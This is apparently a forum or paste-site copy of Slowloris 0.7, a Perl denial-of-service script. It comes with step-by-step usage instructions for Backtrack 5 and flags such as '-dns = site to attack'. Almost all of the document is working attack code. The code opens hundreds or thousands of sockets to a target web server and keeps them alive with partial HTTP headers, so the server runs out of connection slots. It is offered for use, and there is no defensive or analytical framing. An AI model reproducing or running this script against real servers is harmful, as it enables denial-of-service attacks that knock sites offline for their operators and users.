slowloris.pl

1. please note, THIS WILL NOT WORK ON IIS6.0, IIS7.0, lighttpd, nginx, Cherokee, Squid
2.  
3. Usage in Backtrack 5
4. copy #!/usr/bin/perl -w and down>go to home folder>new document>name it slowloris.pl>paste slowloris into it>save>properties>allow executing>open terminal>
5. "./slowloris.pl -dns www.target.com -port 80 -timeout 10 -num 1000 -tcpto 5"
6.  
7. -dns = site to attack
8. -port = port to attack
9. -timeout = how often sockets connect
10. -num = how many sockets
11. -tcpto = tcp timeout
12.  
13. To test for how long to set -timeout for type, "./slowloris.pl -dns www.target.com -port 80 -test"
14.  
15. #!/usr/bin/perl -w
16. use strict;
17. use IO::Socket::INET;
18. use IO::Socket::SSL;
19. use Getopt::Long;
20. use Config;
21.  
22. $SIG{'PIPE'} = 'IGNORE'; #Ignore broken pipe errors
23.  
24. print <<EOTEXT;
25. Sumo Says HI :D and Welcome to Slowloris!
26. EOTEXT
27.  
28. my ( $host, $port, $sendhost, $shost, $test, $version, $timeout, $connections );
29. my ( $cache, $httpready, $method, $ssl, $rand, $tcpto );
30. my $result = GetOptions(
31. 'shost=s' => \$shost,
32. 'dns=s' => \$host,
33. 'httpready' => \$httpready,
34. 'num=i' => \$connections,
35. 'cache' => \$cache,
36. 'port=i' => \$port,
37. 'https' => \$ssl,
38. 'tcpto=i' => \$tcpto,
39. 'test' => \$test,
40. 'timeout=i' => \$timeout,
41. 'version' => \$version,
42. );
43.  
44. if ($version) {
45. print "Version 0.7\n";
46. exit;
47. }
48.  
49. unless ($host) {
50. print "Usage:\n\n\tperl $0 -dns [www.example.com] -options\n";
51. print "\n\tType 'perldoc $0' for help with options.\n\n";
52. exit;
53. }
54.  
55. unless ($port) {
56. $port = 80;
57. print "Defaulting to port 80.\n";
58. }
59.  
60. unless ($tcpto) {
61. $tcpto = 5;
62. print "Defaulting to a 5 second tcp connection timeout.\n";
63. }
64.  
65. unless ($test) {
66. unless ($timeout) {
67. $timeout = 100;
68. print "Defaulting to a 100 second re-try timeout.\n";
69. }
70. unless ($connections) {
71. $connections = 1000;
72. print "Defaulting to 1000 connections.\n";
73. }
74. }
75.  
76. my $usemultithreading = 0;
77. if ( $Config{usethreads} ) {
78. print "Multithreading enabled.\n";
79. $usemultithreading = 1;
80. use threads;
81. use threads::shared;
82. }
83. else {
84. print "No multithreading capabilites found!\n";
85. print "Slowloris will be slower than normal as a result.\n";
86. }
87.  
88. my $packetcount : shared = 0;
89. my $failed : shared = 0;
90. my $connectioncount : shared = 0;
91.  
92. srand() if ($cache);
93.  
94. if ($shost) {
95. $sendhost = $shost;
96. }
97. else {
98. $sendhost = $host;
99. }
100. if ($httpready) {
101. $method = "POST";
102. }
103. else {
104. $method = "GET";
105. }
106.  
107. if ($test) {
108. my @times = ( "2", "30", "90", "240", "500" );
109. my $totaltime = 0;
110. foreach (@times) {
111. $totaltime = $totaltime + $_;
112. }
113. $totaltime = $totaltime / 60;
114. print "This test could take up to $totaltime minutes.\n";
115.  
116. my $delay = 0;
117. my $working = 0;
118. my $sock;
119.  
120. if ($ssl) {
121. if (
122. $sock = new IO::Socket::SSL(
123. PeerAddr => "$host",
124. PeerPort => "$port",
125. Timeout => "$tcpto",
126. Proto => "tcp",
127. )
128. )
129. {
130. $working = 1;
131. }
132. }
133. else {
134. if (
135. $sock = new IO::Socket::INET(
136. PeerAddr => "$host",
137. PeerPort => "$port",
138. Timeout => "$tcpto",
139. Proto => "tcp",
140. )
141. )
142. {
143. $working = 1;
144. }
145. }
146. if ($working) {
147. if ($cache) {
148. $rand = "?" . int( rand(99999999999999) );
149. }
150. else {
151. $rand = "";
152. }
153. my $primarypayload =
154. "GET /$rand HTTP/1.1\r\n"
155. . "Host: $sendhost\r\n"
156. . "User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.503l3; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; MSOffice 12)\r\n"
157. . "Content-Length: 42\r\n";
158. if ( print $sock $primarypayload ) {
159. print "Connection successful, now comes the waiting game...\n";
160. }
161. else {
162. print
163. "That's odd - I connected but couldn't send the data to $host:$port.\n";
164. print "Is something wrong?\nDying.\n";
165. exit;
166. }
167. }
168. else {
169. print "Uhm... I can't connect to $host:$port.\n";
170. print "Is something wrong?\nDying.\n";
171. exit;
172. }
173. for ( my $i = 0 ; $i <= $#times ; $i++ ) {
174. print "Trying a $times[$i] second delay: \n";
175. sleep( $times[$i] );
176. if ( print $sock "X-a: b\r\n" ) {
177. print "\tWorked.\n";
178. $delay = $times[$i];
179. }
180. else {
181. if ( $SIG{__WARN__} ) {
182. $delay = $times[ $i - 1 ];
183. last;
184. }
185. print "\tFailed after $times[$i] seconds.\n";
186. }
187. }
188.  
189. if ( print $sock "Connection: Close\r\n\r\n" ) {
190. print "Okay that's enough time. Slowloris closed the socket.\n";
191. print "Use $delay seconds for -timeout.\n";
192. exit;
193. }
194. else {
195. print "Remote server closed socket.\n";
196. print "Use $delay seconds for -timeout.\n";
197. exit;
198. }
199. if ( $delay < 166 ) {
200. print <<EOSUCKS2BU;
201. Since the timeout ended up being so small ($delay seconds) and it generally
202. takes between 200-500 threads for most servers and assuming any latency at
203. all... you might have trouble using Slowloris against this target. You can
204. tweak the -timeout flag down to less than 10 seconds but it still may not
205. build the sockets in time.
206. EOSUCKS2BU
207. }
208. }
209. else {
210. print
211. "Connecting to $host:$port every $timeout seconds with $connections sockets:\n";
212.  
213. if ($usemultithreading) {
214. domultithreading($connections);
215. }
216. else {
217. doconnections( $connections, $usemultithreading );
218. }
219. }
220.  
221. sub doconnections {
222. my ( $num, $usemultithreading ) = @_;
223. my ( @first, @sock, @working );
224. my $failedconnections = 0;
225. $working[$_] = 0 foreach ( 1 .. $num ); #initializing
226. $first[$_] = 0 foreach ( 1 .. $num ); #initializing
227. while (1) {
228. $failedconnections = 0;
229. print "\t\tBuilding sockets.\n";
230. foreach my $z ( 1 .. $num ) {
231. if ( $working[$z] == 0 ) {
232. if ($ssl) {
233. if (
234. $sock[$z] = new IO::Socket::SSL(
235. PeerAddr => "$host",
236. PeerPort => "$port",
237. Timeout => "$tcpto",
238. Proto => "tcp",
239. )
240. )
241. {
242. $working[$z] = 1;
243. }
244. else {
245. $working[$z] = 0;
246. }
247. }
248. else {
249. if (
250. $sock[$z] = new IO::Socket::INET(
251. PeerAddr => "$host",
252. PeerPort => "$port",
253. Timeout => "$tcpto",
254. Proto => "tcp",
255. )
256. )
257. {
258. $working[$z] = 1;
259. $packetcount = $packetcount + 3; #SYN, SYN+ACK, ACK
260. }
261. else {
262. $working[$z] = 0;
263. }
264. }
265. if ( $working[$z] == 1 ) {
266. if ($cache) {
267. $rand = "?" . int( rand(99999999999999) );
268. }
269. else {
270. $rand = "";
271. }
272. my $primarypayload =
273. "$method /$rand HTTP/1.1\r\n"
274. . "Host: $sendhost\r\n"
275. . "User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.503l3; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; MSOffice 12)\r\n"
276. . "Content-Length: 42\r\n";
277. my $handle = $sock[$z];
278. if ($handle) {
279. print $handle "$primarypayload";
280. if ( $SIG{__WARN__} ) {
281. $working[$z] = 0;
282. close $handle;
283. $failed++;
284. $failedconnections++;
285. }
286. else {
287. $packetcount++;
288. $working[$z] = 1;
289. }
290. }
291. else {
292. $working[$z] = 0;
293. $failed++;
294. $failedconnections++;
295. }
296. }
297. else {
298. $working[$z] = 0;
299. $failed++;
300. $failedconnections++;
301. }
302. }
303. }
304. print "\t\tSending data.\n";
305. foreach my $z ( 1 .. $num ) {
306. if ( $working[$z] == 1 ) {
307. if ( $sock[$z] ) {
308. my $handle = $sock[$z];
309. if ( print $handle "X-a: b\r\n" ) {
310. $working[$z] = 1;
311. $packetcount++;
312. }
313. else {
314. $working[$z] = 0;
315. #debugging info
316. $failed++;
317. $failedconnections++;
318. }
319. }
320. else {
321. $working[$z] = 0;
322. #debugging info
323. $failed++;
324. $failedconnections++;
325. }
326. }
327. }
328. print
329. "Current stats:\tSlowloris has now sent $packetcount packets successfully.\nThis thread now sleeping for $timeout seconds...\n\n";
330. sleep($timeout);
331. }
332. }
333.  
334. sub domultithreading {
335. my ($num) = @_;
336. my @thrs;
337. my $i = 0;
338. my $connectionsperthread = 50;
339. while ( $i < $num ) {
340. $thrs[$i] =
341. threads->create( \&doconnections, $connectionsperthread, 1 );
342. $i += $connectionsperthread;
343. }
344. my @threadslist = threads->list();
345. while ( $#threadslist > 0 ) {
346. $failed = 0;
347. }
348. }
349.  
350. __END__